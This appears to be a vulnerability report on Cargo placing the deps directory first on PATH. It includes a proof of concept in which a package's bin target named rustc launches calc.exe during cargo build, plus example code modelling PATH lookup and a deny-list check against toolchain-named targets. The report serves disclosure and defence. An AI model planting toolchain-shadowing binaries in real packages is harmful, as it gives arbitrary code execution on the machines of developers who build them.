Problem
When cargo builds a package, it adds the dependency output directory to the front of the PATH environment variable.
As a result, an executable that a malicious package ships under a toolchain name is resolved and executed before the real toolchain executable, such as rustc or cc.
This means that building a malicious package can lead to arbitrary code execution.
This appears to be a similar issue to CVE-2024-24787 (https://pkg.go.dev/vuln/GO-2024-2825), which was recently discovered in Go.
However, this bug affects all operating systems, not just Darwin.
Additionally, while CVE-2024-24787 modifies path resolution by directly changing linker flags, Cargo does not require that: a plain binary target with a toolchain name is enough.
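To make the resolution order concrete, here is an added example (not code from this issue or from Cargo) that models a PATH lookup and shows that a file of the same name is taken from whichever directory comes first. The directory names toolchain and target/debug/deps and the marker files it creates under the system temp directory are assumptions constructed for the demonstration; the lookup ignores PATHEXT and executable bits, which a real lookup would honour.

```rust
use std::fs;
use std::path::{Path, PathBuf};

/// Resolve `name` the way a PATH lookup does: walk the directories of
/// `path_var` in order and return the first one holding a regular file of
/// that name. `sep` is the PATH separator (':' on Unix, ';' on Windows).
/// Simplified model: PATHEXT and the executable bit are not checked.
fn resolve_in_path(name: &str, path_var: &str, sep: char) -> Option<PathBuf> {
    path_var
        .split(sep)
        .filter(|d| !d.is_empty())
        .map(|d| Path::new(d).join(name))
        .find(|candidate| candidate.is_file())
}

/// Build a scratch layout under the temp dir (names are assumptions for this example):
///   <tmp>/toolchain/rustc            stands in for the real compiler
///   <tmp>/target/debug/deps/rustc    stands in for a package's bin target named "rustc"
/// Returns the parent directory name of the file chosen when deps is prepended
/// to PATH and when it is appended, in that order.
fn demo_path_order() -> (String, String) {
    let root = std::env::temp_dir().join(format!("cargo-path-demo-{}", std::process::id()));
    let toolchain = root.join("toolchain");
    let deps = root.join("target").join("debug").join("deps");
    fs::create_dir_all(&toolchain).unwrap();
    fs::create_dir_all(&deps).unwrap();
    fs::write(toolchain.join("rustc"), "real compiler").unwrap();
    fs::write(deps.join("rustc"), "package-provided binary").unwrap();

    let sep = if cfg!(windows) { ';' } else { ':' };
    // What cargo does today (deps first) versus the proposed fix (deps last).
    let prepended = format!("{}{}{}", deps.display(), sep, toolchain.display());
    let appended = format!("{}{}{}", toolchain.display(), sep, deps.display());

    let parent_name = |p: PathBuf| -> String {
        p.parent().unwrap().file_name().unwrap().to_string_lossy().into_owned()
    };
    let first = parent_name(resolve_in_path("rustc", &prepended, sep).unwrap());
    let second = parent_name(resolve_in_path("rustc", &appended, sep).unwrap());

    let _ = fs::remove_dir_all(&root);
    (first, second)
}

fn main() {
    let (prepended, appended) = demo_path_order();
    println!("deps first -> rustc resolved from: {}", prepended);
    println!("deps last  -> rustc resolved from: {}", appended);
}
```

With the deps directory prepended, the lookup returns the file under deps; with it appended, the toolchain copy wins, which is the whole difference between the current behaviour and the first proposed fix.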
Steps
1. Configure the malicious package.
rustc.rs

```rust
use std::process::Command;

// Proof-of-concept payload: spawns the calculator when this binary is run in
// place of the real rustc.
fn main() {
    let _test = Command::new("C:\\Windows\\System32\\calc.exe").spawn();
}
```

main.rs

```rust
mod rustc;

fn main() {
    println!("Hello, world!");
}
```

Cargo.toml

```toml
[package]
name = "poc"
version = "0.1.0"
edition = "2021"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
cc = "1.0.94" # for waiting for the malicious program

[[bin]]
name = "rustc"
path = "src/rustc.rs"

[[bin]]
name = "test"
path = "src/test.rs"
```
2. Running cargo build executes arbitrary code (poc.mp4: https://drive.google.com/file/d/1wnK9YxAeI6HwLXSVp5k7eN-EvtD9hMa8/view?usp=sharing).
Possible Solution(s)
1. Place the build/deps directory at the end of PATH.
The security team says that this would break legitimate functionality that expects local libraries to be considered before system libraries. However, it is questionable whether there are cases where local libraries should be considered first.
2. Register a blacklist that prevents building a binary target whose name matches an executable of the Rust toolchain.
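As an added example of the blacklist idea (not Cargo's code, and not an implementation the issue spells out), the following Rust program scans a manifest for bin targets whose names collide with toolchain executables. The TOOLCHAIN_NAMES list, the has_main_rs flag and the auto_bins argument for src/bin/*.rs targets are assumptions; the embedded manifest is constructed to mirror the proof of concept above, plus an auto-discovered Cc target to show that the comparison has to be case-insensitive and ignore .exe, as Windows resolution is.

```rust
/// Executable names that Cargo, rustc or the linker may look up on PATH during
/// a build. The list is an assumption for this example, not one Cargo ships.
const TOOLCHAIN_NAMES: &[&str] = &[
    "cargo", "rustc", "rustdoc", "cc", "c++", "gcc", "g++", "clang", "clang++",
    "ld", "lld", "link", "ar", "as", "rust-lld", "gcc-ld",
];

/// Normalise a target name for comparison: case-insensitive and without a
/// trailing `.exe`, since Windows resolves `rustc` to `RUSTC.EXE`.
fn normalise(name: &str) -> String {
    let lower = name.to_ascii_lowercase();
    lower.strip_suffix(".exe").unwrap_or(lower.as_str()).to_string()
}

/// Collect bin-target names from a manifest with a minimal line-oriented scan:
/// `name = "..."` inside `[[bin]]` tables, plus `[package] name` when
/// src/main.rs exists (it becomes a bin of that name). Auto-discovered
/// src/bin/*.rs targets are not in the manifest, so they are passed in.
fn bin_target_names(manifest: &str, has_main_rs: bool, auto_bins: &[&str]) -> Vec<String> {
    let mut names: Vec<String> = auto_bins.iter().map(|s| s.to_string()).collect();
    let mut section = String::new();
    for raw in manifest.lines() {
        let line = raw.split('#').next().unwrap().trim(); // drop comments
        if line.starts_with('[') {
            section = line.trim_matches(|c: char| c == '[' || c == ']').to_string();
            continue;
        }
        if let Some((key, value)) = line.split_once('=') {
            if key.trim() == "name" {
                let value = value.trim().trim_matches('"');
                match section.as_str() {
                    "bin" => names.push(value.to_string()),
                    "package" if has_main_rs => names.push(value.to_string()),
                    _ => {}
                }
            }
        }
    }
    names
}

/// Bin targets whose normalised name collides with a toolchain executable.
/// A non-empty result means `cargo build` would drop a binary of that name
/// into the deps directory, ahead of the real tool on PATH.
fn shadowing_bins(manifest: &str, has_main_rs: bool, auto_bins: &[&str]) -> Vec<String> {
    bin_target_names(manifest, has_main_rs, auto_bins)
        .into_iter()
        .filter(|n| TOOLCHAIN_NAMES.contains(&normalise(n).as_str()))
        .collect()
}

/// Constructed manifest mirroring the proof of concept in this issue.
const POC_MANIFEST: &str = r#"
[package]
name = "poc"
version = "0.1.0"
edition = "2021"

[dependencies]
cc = "1.0.94"

[[bin]]
name = "rustc"
path = "src/rustc.rs"

[[bin]]
name = "test"
path = "src/test.rs"
"#;

fn main() {
    // "Cc" stands in for an auto-discovered src/bin/Cc.rs target.
    let hits = shadowing_bins(POC_MANIFEST, true, &["Cc"]);
    if hits.is_empty() {
        println!("no bin target shadows a toolchain executable");
    } else {
        println!("refusing to build: bin targets shadow toolchain executables: {:?}", hits);
    }
}
```

The check is deliberately run on target names rather than on paths, because the file placed in the deps directory is named after the target, not after its source file (the proof of concept's rustc target lives in src/rustc.rs but could just as well live anywhere).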
Notes
I reported this bug to the Rust Security Response WG, but it was not treated as a security vulnerability.